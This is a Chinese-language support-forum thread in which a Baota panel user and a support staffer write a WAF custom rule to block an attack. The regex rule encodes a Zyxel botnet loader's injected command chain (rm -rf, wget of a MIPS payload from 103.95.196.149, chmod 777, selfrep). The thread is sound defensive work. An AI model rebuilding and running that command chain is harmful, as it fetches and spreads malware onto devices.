【已解答】请问如何禁止这类攻击脚本

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：8.0

系统版本：cenyos8.2

问题描述：如下图所示，这应该是个恶意攻击脚本吧，那么如何禁止呢？

相关截图（日志、错误）：

目前宝塔面板中已开启禁国外，但是无效

在自定义规则拦截里边，填写下面的代码可以拦截吗？[color=rgba(0, 0, 0, 0.85)]/bin/zhttpd/[^/]+/tmp\;[^/]+/rm\-rf\+/.\*/[^/]+/wget\ http://103\.95\.196\.149/mips\;[^/]+/chmod\ 777\ [^/]+/.\*/[^/]+/zyxel\.selfrep\;
[color=rgba(0, 0, 0, 0.85)]如图：


请问这样设置正确吗？

宝塔用_3736 发表于 2023-7-3 14:19
在自定义规则拦截里边，填写下面的代码可以拦截吗？/bin/zhttpd/[^/]+/tmp\;[^/]+/rm\-rf\+/.\*/[^/]+/wget ...

您好，针对这个这个拦截信息，您可以复制下面的一个规则添加进去，具体是否能拦截成功需要您测试以下

1. /bin/zhttpd/[^/]+/tmp;[^/]+/rm-rf+/.*/[^/]+/wget http://103\.95\.196\.149/mips;[^/]+/chmod 777 [^/]+/.*/[^/]+/zyxel\.selfrep\

复制代码

堡塔运维小林 发表于 2023-7-3 14:58
您好，针对这个这个拦截信息，您可以复制下面的一个规则添加进去，具体是否能拦截成功需要您测试以下
...

是填写在我楼上图片的这个【自定义拦截规则】这里吗？谢谢

宝塔用_3736 发表于 2023-7-3 15:05
是填写在我楼上图片的这个【自定义拦截规则】这里吗？谢谢

是的，填写到自定义规则拦截那里

堡塔运维小林 发表于 2023-7-3 15:21
是的，填写到自定义规则拦截那里

看楼上图，我已经填写了，我看了下，我填写的好像和你给的是一样的

宝塔用_3736 发表于 2023-7-3 15:24
看楼上图，我已经填写了，我看了下，我填写的好像和你给的是一样的

您好，如果一样忽略我发的这个即可

堡塔运维小林 发表于 2023-7-3 15:27
您好，如果一样忽略我发的这个即可

麻烦您看下我填写是有效吗，我仔细对比了下，好像是您给出的和我之前填写的有两个位置差/这个标识，谢谢您啦

宝塔用_3736 发表于 2023-7-3 15:31
麻烦您看下我填写是有效吗，我仔细对比了下，好像是您给出的和我之前填写的有两个位置差/这个标识，谢谢 ...

您好，使用我发给您的规则添加进去

堡塔运维小林 发表于 2023-7-3 15:35
您好，使用我发给您的规则添加进去

好的，十分感谢

堡塔运维小林 发表于 2023-7-3 15:35
您好，使用我发给您的规则添加进去

请问在哪查看这个规则的拦截记录呢？

宝塔用_3736 发表于 2023-7-3 16:53
请问在哪查看这个规则的拦截记录呢？

您好，如果有拦截，看一下记录里面的过滤规则是不是您填写的

堡塔运维小林 发表于 2023-7-3 17:42
您好，如果有拦截，看一下记录里面的过滤规则是不是您填写的

2楼图片这里设置的自定义拦截，在哪查看拦截记录呢？
因为我想看看设置后是否有效。